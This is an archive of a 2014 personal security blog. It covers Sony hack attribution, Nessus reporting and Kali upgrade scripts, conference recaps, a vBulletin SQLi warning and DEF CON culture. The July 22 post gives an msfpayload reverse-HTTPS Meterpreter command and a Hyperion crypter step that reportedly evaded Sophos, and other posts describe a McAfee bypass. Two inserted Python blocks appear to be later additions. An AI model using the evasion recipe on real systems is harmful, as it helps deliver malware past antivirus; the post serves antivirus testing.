Friday, December 19, 2014

Sony, the FBI, and NK

The FBI came out saying they thought North Korea hacked Sony: http://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation.

The main points are: the malware code looked reused from previous code attributed to North Korea, the malware uses NK IP addresses, and the "tools" used were similar to a South Korea bank attack believed to be from NK, whatever that means. Here is the problem, from the U.S. intelligence department's own mouth:
Another indicator pointing to U.S. intelligence is the familiarity with Sony’s computer network. “It’s clear from the hard-coded paths and passwords in the malware that whoever wrote it had extensive knowledge of Sony’s internal architecture and access to key passwords,” Rogers notes. “While it’s plausible that an attacker could have built up this knowledge over time and then used it to make the malware, Occam’s razor suggests the simpler explanation of an insider.”


That is still all true, which makes the FBI release read like nonsense to me. Consider the possibility of a pure North Korea attack with no insider. That would mean the attacker would need to gain access to Sony's network, likely with an email phishing attack or maybe an undetected web attack, gain access to many files, find passwords in password files and system documentation and diagrams, and piece together the information needed to make this malware. And while possible, that makes no sense at all to me. Once you have that level of access and understanding, making malware is the last thing you would do. At that point you simply use normal system tools to extract all the data you want without being detected or leaving malware behind. Anyone knowledgeable enough to create this malware would know better than to use malware if they already had all the access they needed without it. This scenario makes no sense to me and, as the quote above states, doesn't pass the Occam's razor test. Let's assume they had access, but couldn't use the tools they needed to get the data and needed to write their own code and... It just doesn't pass the test unless they know something they aren't telling us, which is possible, but that is still more assumptions and therefore still doesn't pass the test.

What does pass the test is an insider with this knowledge who either is behind the attack, or willfully gave up this information to an attacker and is part of the attack. The attacker could still be North Korea, but only with an insider's help. But more likely than that, an insider working with another outside group with the skills needed, intent on financial gain from extorting money from Sony, had the idea of trying to blame North Korea, or just Korea in general, for the attack to cover their tracks. If they knew how the company and media and governments would jump on it for their own self-interests, they are brilliant. But I'm guessing they didn't know it would work out so well but rolled with it when the NK part of the story took on a life of its own. And why not? Now that the FBI said what they said, for whatever reason, it is hard for me to picture them finding and bringing to justice the criminals involved if it turns out NK wasn't behind it. And that is the dangerous part of this game, which I predict will be played out again and again. How easy is it to get away with a crime like this and blame a nation state if we are so willing to let the nation state be blamed?


Monday, November 24, 2014

New Scripts and Old Script Changes

I pushed up some scripts I banged out today here: https://github.com/secjohn/nessus-reporting
I'm a blue team guy again and I needed a better way to share Nessus findings, both vulnerability scans and compliance audit scans, with my admins. The Nessus HTML and CSV exports just don't cut it, and I'm sick of manually editing the CSV exports into something people want. So I made these scripts to turn .nessus files into spreadsheets my admins want and figured I would share them. They are freshly made and I'm sure some improvements are needed. But so far they appear to work fine, even on very large .nessus files.
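As an added illustration of the reshaping those scripts do (this is not the code from the nessus-reporting repo), the following parses the .nessus XML layout (NessusClientData_v2, one ReportItem per plugin hit per host) and collapses it into one spreadsheet row per finding with every affected host:port listed, which is the form admins can actually work from. The sample scan is constructed inline; plugin IDs and hosts in it are made up.

```python
import csv
import io
import xml.etree.ElementTree as ET

# Constructed sample in the .nessus (NessusClientData_v2) XML layout; not a real scan.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
 <Report name="Example">
  <ReportHost name="10.0.0.5">
   <HostProperties><tag name="host-ip">10.0.0.5</tag><tag name="host-fqdn">web1.example.test</tag></HostProperties>
   <ReportItem port="443" svc_name="www" protocol="tcp" severity="3" pluginID="11111" pluginName="Example TLS weakness" pluginFamily="General">
    <risk_factor>High</risk_factor>
    <solution>Disable the weak cipher suites.</solution>
    <plugin_output>Weak suites: TLS_RSA_WITH_RC4_128_SHA</plugin_output>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="22222" pluginName="Host info" pluginFamily="General">
    <risk_factor>None</risk_factor>
   </ReportItem>
  </ReportHost>
  <ReportHost name="10.0.0.6">
   <HostProperties><tag name="host-ip">10.0.0.6</tag></HostProperties>
   <ReportItem port="443" svc_name="www" protocol="tcp" severity="3" pluginID="11111" pluginName="Example TLS weakness" pluginFamily="General">
    <risk_factor>High</risk_factor>
    <solution>Disable the weak cipher suites.</solution>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""

SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}


def parse_nessus(xml_text, min_severity=1):
    """Group ReportItems by plugin: one finding per plugin, listing every affected host:port.
    Info-level items (severity 0) are dropped by default since admins don't act on them."""
    root = ET.fromstring(xml_text)
    findings = {}
    for host in root.iter("ReportHost"):
        # Prefer the FQDN from HostProperties, then the IP, then the ReportHost name.
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        hostname = props.get("host-fqdn") or props.get("host-ip") or host.get("name")
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            if sev < min_severity:
                continue
            pid = item.get("pluginID")
            entry = findings.setdefault(pid, {
                "plugin_id": pid,
                "name": item.get("pluginName"),
                "severity_num": sev,
                "severity": SEVERITY_NAMES.get(sev, str(sev)),
                "solution": (item.findtext("solution") or "").strip(),
                "hosts": [],
            })
            entry["hosts"].append(f"{hostname}:{item.get('port')}/{item.get('protocol')}")
    # Highest severity first, then most widespread, so the top of the sheet is what matters most.
    return sorted(findings.values(), key=lambda f: (-f["severity_num"], -len(f["hosts"])))


def findings_to_csv(findings):
    """Render grouped findings as CSV text that opens cleanly in a spreadsheet."""
    buf = io.StringIO()
    w = csv.writer(buf)
    w.writerow(["Severity", "Plugin ID", "Finding", "Affected (host:port/proto)", "Count", "Solution"])
    for f in findings:
        w.writerow([f["severity"], f["plugin_id"], f["name"], "; ".join(f["hosts"]), len(f["hosts"]), f["solution"]])
    return buf.getvalue()


if __name__ == "__main__":
    print(findings_to_csv(parse_nessus(SAMPLE_NESSUS)))
```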

I also commented out the crypter parts of obfy. It hasn't worked for a while now, ever since some change to msfpayload. Obfy is still a quick way around McAfee, but that is about it at this point. I think it still works against some others if you manually run ditto on the payloads, but I never got ditto to work correctly with wine so I couldn't script it out. Veil is a better automated option for most things and I use it a lot now. Obfy is still good if you know you are going against McAfee, or to edit an asm file you made yourself for a longer term custom payload like a signed payload for phishing, etc. But in general I wouldn't use obfy on a normal pentest anymore if I didn't know the AV product. I would highly recommend using it in AV testing if you are buying one.

Wednesday, October 29, 2014

Update to Kali-Scripts

It has been a while but I updated the Kali update script I have on github and added a kaliautoupgrade.sh script. They can be found here: https://github.com/secjohn/kali-scripts

The kaliupdate.sh script has minor changes. The biggest one is I changed to dist-upgrade from just upgrade. When I wrote the script there was no difference, and a dist-upgrade burned me once on BT5 back in the day, so I didn't use it. The dist-upgrade seems to be needed and fine now though.

I'm on the blue team again, I now don't run everything from my laptop, and having Kali on a server made me want a script for a cron job. So I edited down the script, tweaked the dist-upgrade line so conf files wouldn't stop it, and made kaliautoupgrade.sh. If you have a Kali server and want to upgrade in cron, there you go. One warning: the script assumes things are there for the most part. The one time installs and checks are in the kaliupdate.sh script; you should run it once with a -a before setting up this job.

Kali Dist-Upgrade Issues Fun:
One note on the dist-upgrade: I did run into an issue with it. But it was resolvable. I got an error saying it couldn't finish and to run apt-get -f install to fix it. So I did and that failed. It said it needed to overwrite a file that was owned by another package. At the end it gives the deb file that has an error. If you run into that, what you need to do is:
dpkg -i --force-overwrite /the/path/debfilegivingtheerror.deb
apt-get -f install

That will let the file be overwritten. After the apt-get -f install finished you need to run the apt-get dist-upgrade again. I had it fail again and had to do the same steps above a second time. Life has been good since then.
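Since this is the kind of failure that stops an unattended cron upgrade dead, here is an added example (my own, not part of kali-scripts) that automates the recovery above: run dist-upgrade, and if it fails with the "trying to overwrite ... which is also in package" error, force-install only the one archive dpkg named, run apt-get -f install, and retry. The dpkg output it parses is a constructed sample with made-up package names; the runner is injectable so the logic can be dry-run without touching a real system.

```python
import re
import subprocess

# Constructed sample of the failure dpkg prints in this situation (package names are made up).
SAMPLE_FAILURE = """Unpacking libfoo1 (1.2-3) over (1.2-2) ...
dpkg: error processing archive /var/cache/apt/archives/libfoo1_1.2-3_amd64.deb (--unpack):
 trying to overwrite '/usr/lib/libfoo.so.1', which is also in package libfoo-dev 1.2-2
Errors were encountered while processing:
 /var/cache/apt/archives/libfoo1_1.2-3_amd64.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
"""

ARCHIVE_RE = re.compile(r"error processing archive (\S+\.deb)")
CONFLICT_RE = re.compile(r"trying to overwrite '([^']+)', which is also in package (\S+)")

# Non-interactive dist-upgrade: keep existing conf files so prompts don't hang the cron job.
DIST_UPGRADE_CMD = ["apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef",
                    "-o", "Dpkg::Options::=--force-confold", "dist-upgrade"]
FIX_CMD = ["apt-get", "-y", "-f", "install"]


def find_overwrite_conflict(output):
    """Return (deb_path, file, other_package) if the output shows an overwrite conflict, else None."""
    archive = ARCHIVE_RE.search(output)
    conflict = CONFLICT_RE.search(output)
    if archive and conflict:
        return archive.group(1), conflict.group(1), conflict.group(2)
    return None


def run(cmd):
    """Real runner: execute the command and return (exit code, combined stdout+stderr)."""
    p = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
    return p.returncode, p.stdout


def repair_dist_upgrade(runner=run, max_rounds=3):
    """Run dist-upgrade; on the overwrite failure, force the named archive, fix deps and retry.
    Returns the list of archives that had to be force-installed. Any other failure raises."""
    forced = []
    for _ in range(max_rounds):
        code, out = runner(DIST_UPGRADE_CMD)
        if code == 0:
            return forced
        _, out2 = runner(FIX_CMD)  # the post's first step; it fails too when a file conflict exists
        conflict = find_overwrite_conflict(out + out2)
        if conflict is None:
            raise RuntimeError("dist-upgrade failed for a reason this script does not handle:\n" + out + out2)
        deb, path, other = conflict
        # Force only the single archive dpkg complained about, never a blanket --force-overwrite.
        code, out3 = runner(["dpkg", "-i", "--force-overwrite", deb])
        if code != 0:
            raise RuntimeError("forced install of %s failed:\n%s" % (deb, out3))
        runner(FIX_CMD)
        forced.append(deb)
    raise RuntimeError("gave up after %d rounds" % max_rounds)


def make_fake_runner(failure_output):
    """Dry-run helper: the first dist-upgrade fails with failure_output, everything after succeeds."""
    calls = []
    state = {"failed_once": False}

    def runner(cmd):
        calls.append(list(cmd))
        if cmd[-1] == "dist-upgrade" and not state["failed_once"]:
            state["failed_once"] = True
            return 1, failure_output
        return 0, ""
    return runner, calls


if __name__ == "__main__":
    print("forced:", repair_dist_upgrade())
```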

Friday, October 24, 2014

SecureCIO Chicago and John McAfee

So I got invited to this thing: http://chicago.securecio.com/cm I wasn't sure how or why and I almost deleted it until I noticed John McAfee was speaking. Then I clicked the hell yes button. I figured either the people running this thing must be pretty cool or totally clueless and were going to freak out, and either way this was going to be fun. So I went. It was a bit odd and slow for me at first. The host started with an urban legend; a few seconds on Snopes on my phone confirmed my hunch. Not long after that he said to use the news about big attacks to scare the crap out of our leaders to get more budget. I don't think he was kidding, maybe half kidding. Another speaker worked for a secure email company and talked about how his product helped secure email, joy. I was starting to wonder what I got myself into. Then at the break I found an old friend of mine and that was good. Then I saw Wendy's blue hair and I recognized her from B-Sides Vegas and I knew McAfee must be close, and he was, playing the piano. I went and hung out with him as much as I could. The cool kids all came out to talk to him, and as long as I was close to him I found it easier to talk to other people; these were my people. After his talk @minossec came over to say hi to him and it was cool to see him again too. It turns out the director of this thing is a cool guy and has worked with John McAfee before and, like me, was trying to hang out with him as much as possible, and it was nice meeting him too. Finally John McAfee spoke. It was a good talk, a different tone than B-Sides; he knew the audience was different. Mostly he talked about phone insecurity and how we are all idiots for letting our flashlight app or bible reading app access our microphone and record us without telling us, and how he has a new Android app which tells you when that happens, and if you try it you will see how stupid you have been and how you are being spied on.
I ended up at the bar there but bailed before it got too late and somehow totally forgot to eat dinner. McAfee left shortly after his talk unfortunately but it was great seeing him and hearing him speak.

Like I said, the person running this thing seems cool. Most of the more technical security leaders I know weren't there. We should try to fix that going forward, this thing has potential if we can get the right people to start showing up by mixing a bunch of burbsec/chisec folks in.

Thursday, October 16, 2014

DerbyCon 4 Recap

I'm a bit late but here it is anyway. DerbyCon was good overall this year and still is my new favorite security con. I must say I felt the talks were overall not as strong as the last two years and I didn't walk away with as many good pieces of data and ideas, a feeling I confirmed with several other people. But it was still good, and it isn't clear how much of that is based on the talks that were selected, or that the talks in 2014 just aren't as good as a whole, or it is a bullshit feeling and we are building old DerbyCons up in our minds. But like I said, still my favorite, and I still plan to go next year. On a side note I explored more of Louisville this year than in years past and I'm starting to really love that city.

All the videos can be found here:
http://www.irongeek.com/i.php?page=videos/derbycon4/mainlist

If you didn't get to go or missed some talks here are a few I liked:
Threat Modeling for Realz – Bruce Potter
Application Whitelisting: Be Careful Where The Silver Bullet Is Aimed – David McCartney
InfoSec – from the mouth of babes (or an 8 year old) – Reuben A. Paul (RAPstar) and Mano Paul
How to Secure and Sys Admin Windows like a Boss. – Jim Kennedy
Building a Modern Security Engineering Organization – Zane Lackey
Information Security Team Management: How to keep your edge while embracing the dark side – Stephen C Gay
RavenHID: Remote Badge Gathering -or- Why we sit in client bathrooms for hours – Lucas Morris – Adam Zamora
Building a Web Application Vulnerability Management Program – Jason Pubal

This list is far from complete; I haven't watched all the videos of talks I missed and want to see yet. But it is taking a while and I wanted to get this out. So consider that list a starting point, there are a whole lot of good talks up there. Everyone should spend a few hours to watch the ones that apply to you the most.

So far I think the best piece of info I got was from Jason Pubal's talk that exposed me to ThreadFix. It was a pain for me to get it working on Debian but that is just because I'm too stubborn to use Windows I guess. I think that might be another blog post soon. But let me say, my developers already love the thing and I just got it working. If you have developers and have to give them scan data, check this tool out.

Let me know what videos you think I should watch that I didn't link. I won't watch them all so let me know if you think I'm missing something cool.

Friday, September 5, 2014

"So how come we still see so many low ball salary offers?"

This morning I saw this on twitter from @mckeay:
I wanted to respond but it will take more words than Twitter allows, so here is my answer. Let's see how bad @hackerHuntress thinks I screwed this up.

There are two main reasons. Reason one, the company doesn't care about security; the role is for a compliance check box and to have someone to fire when they get breached. Reason two, some senior person in the company is out of touch and refuses to believe a security person makes more than a Windows Admin, and/or the company's salary ranges are fixed and the culture is so messed up they can't change them easily.

My overall advice is to avoid companies that post InfoSec jobs and very low salary ranges. My more complicated advice is as follows:

If you really, really want a job you see posted but the salary is crazy low, say you can walk to the office or something, apply anyway and see if you can talk to someone and help them understand the market, what you currently make, what the job is worth, etc. If the company is stuck with reason two above, the recruiter and hiring manager may know this and are collecting evidence to sell it to HR or the CIO or whoever to get the salary range adjusted. If that is the case and it works out for them and you helped them make their case, you will likely get a call in for an interview once they get the salary range adjusted. But if that turns out not to be the case, don't take the job! I don't care how close to your house the company is. If it turns out to be reason one, you will hate the job and get nothing done. Then at some point something bad will happen because they refused to let you do your job or take your advice, and you will be fired and replaced by someone else willing to work for a low salary. Not a good career move. Either way, if you try this route don't get your hopes up; this will rarely work out because of timing. It may take them 6 months or even a year before they get their act together and call you because they got the salary range increased.

There is one group of people who can take advantage of the reason one companies, and let's face it, someone should: people who are looking to get into the InfoSec field and are making less money than the job is offering anyway. This is not the ideal way to break into InfoSec, far from it. My typical advice is get a job in IT if you haven't already and become the security focused person on your team. Become buddies with the security team, and then when a junior role opens up you will get it. But if that isn't working out for you and you are, say, stuck on the help desk team, taking a security manager role that pays half what it should for a year or so is an option. Spend that year teaching yourself about security since they don't care what you do anyway, and then get a real security engineer job someplace else by highlighting what you taught yourself, and make your title on your resume manager/engineer or something like that. But be warned, if you stick around too long they will fire you when a breach happens. Any company that will hire a help desk person on the cheap to be their security manager has one goal with the role: to fire the person when something bad happens. So get out before that happens, and know you are risking that happening before you are ready.

Tuesday, July 22, 2014

Obfy,Hyperion Crypter, and bypassing AV

I've noticed for a while now that payloads made by obfy that are encrypted with Hyperion Crypter don't seem to work on my system. I figured I screwed up crypter on my VM. But that isn't it, something else is wrong, I think.

First let me say there is a new version of Hyperion Crypter, you should download it and compile and install it.

Now with that out of the way, I'm testing Sophos right now. While obfy by itself seems to still bypass McAfee with no issues, it doesn't get past Sophos, and with the crypter part broken I needed to do something else. So I tried smbexec and it worked fine against Sophos, and I noted that the payload was encrypted by crypter and it worked. Note the compile and install it link above for smbexec and crypter info if that is new to you. So that got me wondering. Next I made a simple payload:
msfpayload windows/meterpreter/reverse_https LHOST=10.1.1.1 LPORT=443 X >payload.exe
Then I ran crypter.exe on it:
cd /opt/crypter (crypter only seems to work while you are in the directory)
wine ./crypter.exe /root/payload.exe payloadc.exe

Payload.exe was picked up by Sophos and will be by any AV program. But payloadc.exe worked fine and the shell worked. Simple as that. No Veil framework, smbexec, encoding, magic or anything needed. An msfpayload generated exe file run through crypter.exe and Sophos is fine with it. Two steps and easy (it should be noted this is the Sophos install I'm testing against, which is a live corp PC and not managed/installed by me, so it may or may not be everything they can do to detect payloads, configured well, etc.).

This goes to show different AV bypassing techniques work better for different vendors, and having many tools to pull from is your best option. That said, it annoys me that crypter.exe creates broken executables with obfy files but not msfpayload files, and I don't know why, or why it suddenly stopped working when I didn't change anything. I don't even know if this is a problem with everyone or just me.

If you use this tool and have feedback let me know. If I hear that it doesn't work for other people too and collectively we can't figure out why I will probably pull that option from the code. In reality the more powerful part of obfy is altering the ASM of just about any ASM file you feed into it quickly to save you the time of doing it manually. In that case it is still a nice supporting tool, and of course for the time being a bypass McAfee button for some strange reason. I expect that part to stop working, someday.

Friday, July 18, 2014

Change your password gamers

A quick note for all you online gamers out there. If you play online games, MMOs, etc. and have for a while, you probably have joined a fair number of online gaming boards over the years. Guild after guild most likely, plus alliance after alliance if you play EVE. A good number of those sites are running VBulletin software. If you game a lot you probably recognize a VBulletin site without even having to scroll down to the bottom and see the logo, and are happy to see it and not a less friendly free forum site. Well, there is a new SQLi attack for the 5.X branch of that software and the people who found it said they will release the code in the wild soon. The official announcement is here: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4097503-security-patch-release-for-vbulletin-5-0-4-5-0-5-5-1-0-5-1-1-and-5-1-2

It should be noted this isn't the first SQLi attack found in this software over the years. But I have a feeling this one is going to be used a lot, so I'm giving this warning.

For those who don't know, a SQLi attack allows people to collect data from the database the site uses to store things like, say, your username and password. VBulletin by default stores passwords using an MD5 hash and a 3 character salt. If you don't know what that means, just know it means it is easy to crack and get your password, especially weak ones. No biggie right? Well ask yourself...

On any of these numerous sites you signed up to over the years (god help EVE players, they probably can't even find all the old alliance ones), how easy is it for someone to find the game or games you play and the username you use to login with? If you are good, your login name is nowhere on any of these sites for most games and your account names aren't the same or a single character off from them. Some games like ESO are idiotic and force you to tell everyone your login name, however. If by chance you play ESO, or one of your character's names is also your login name for a game and you give that name up in posts or signatures or profiles in forums all over the Internet, ask yourself this. Did you use the same password on one or more game forums that you use to login to the game with? If so, you are either going to spend some time changing passwords, or learn a life lesson the hard way when your account is banned for gold selling or something, and when you finally get it unbanned you have nothing; even your characters are deleted.

Think about it. You should never use a game password on forum sites, ever, ever, ever. And changing 1 character at the end isn't clever enough not to get figured out, btw.

So if you are freaking right now do this:
1. Stop using your character name as your login name where you can help it (ESO aside, that was a bad move on their part)
2. Never use passwords for games on any other website
3. Go change all your game passwords

If you share passwords you likely don't have a system and/or password manager. Here is some final advice.
Come up with a system to help you remember passwords without sharing them, like incorporating part of the name of the site into the password.
Use a password manager. Here are three I like:
LastPass: Web plugin, cross platform. My current option due to the cross platform support, free
KeePass: Good stand-alone one for Windows, I found it annoying on the Mac, free
PINs: Good stand-alone one for Windows, older now but still good and doesn't need an install. The password file and the exe is all you need and it works, so it is 100% portable, but Windows only, free

Thursday, July 17, 2014

It is time for DEF CON to grow up

I've been putting this blog post off for a while and I've read a few others like it while I've been putting it off, so I almost didn't bother. But I think I have something slightly different to say so I decided it was worth it. Let me start from the beginning. DEF CON is special to me. DEF CON 8 was pure magic in my life; that was my first one and it changed my life. I've been to every one since except for one due to the birth of my child, which was poor planning on my part. So what I say is with love and real feedback.

At DEF CON 8 it was also my first trip to Vegas. All the half dressed women walking around, some handing out floppy disks with nude pics of themselves on them, was part of the Vegas experience to me. I loved it. But that was a long time ago. I recently had to explain to a good female friend of mine who was wanting to go to DEF CON that it was probably a bad idea. I did it by explaining in detail how Hacker Jeopardy worked. Oh... she said. Then I had to explain that a good number of con goers have limited social skills and it would be highly likely for her to get stared at and inappropriately propositioned during the con, and the Goons would almost certainly ignore any complaints about it. She decided not to go, which I thought was wise.

That conversation got me wondering, do I want my daughter to go when she is old enough? I've always wanted that since I had kids, but the more I think of it, the more the answer is no, unless the con grows up. It will be a world she will be unfamiliar with and I don't want to expose it to her in that way. In short, DEF CON's attitude about women is roughly based on what a young white male's attitude was roughly 20 years ago.

So, it is past time for DEF CON to grow up. It is no more appropriate for DEF CON to still have 20 year old attitudes about women than it would be for, say, a southern country club to still have 50 year old attitudes about race. There should be no objectifying women in any official event, which would include no stripping in Hacker Jeopardy. Women and men not wearing enough clothes should be asked to leave until fully dressed. Goons should be trained to not only deal with inappropriate and unwanted advances and comments properly but should look for them and act upon them even if the victim doesn't complain, since the problem is already well known. That should hopefully set the tone and change the culture, and after a year or two the Goons could back off a bit.

I don't think any of this will happen. That said, my plan this year is to skip Black Hat and go to B-Sides Vegas instead. I plan to go to DEF CON but I don't plan to spend a dime on anything but a badge. Not a huge protest I know, but it is a start, and like I said, DEF CON is special to me. I'll see how things go. If nothing changes this year and there is nothing to make me think it will be different next year, I probably won't be going back to DEF CON after this year until I hear they have changed. There is no reason to put up with it anymore. B-Sides in many cities are great and DerbyCon is great.

I recommend everyone else that goes think about this as well and if it matters to you start making your voices heard and stop going if they don't listen. Times are different, we can skip DEF CON without missing out and I'm starting to think we should.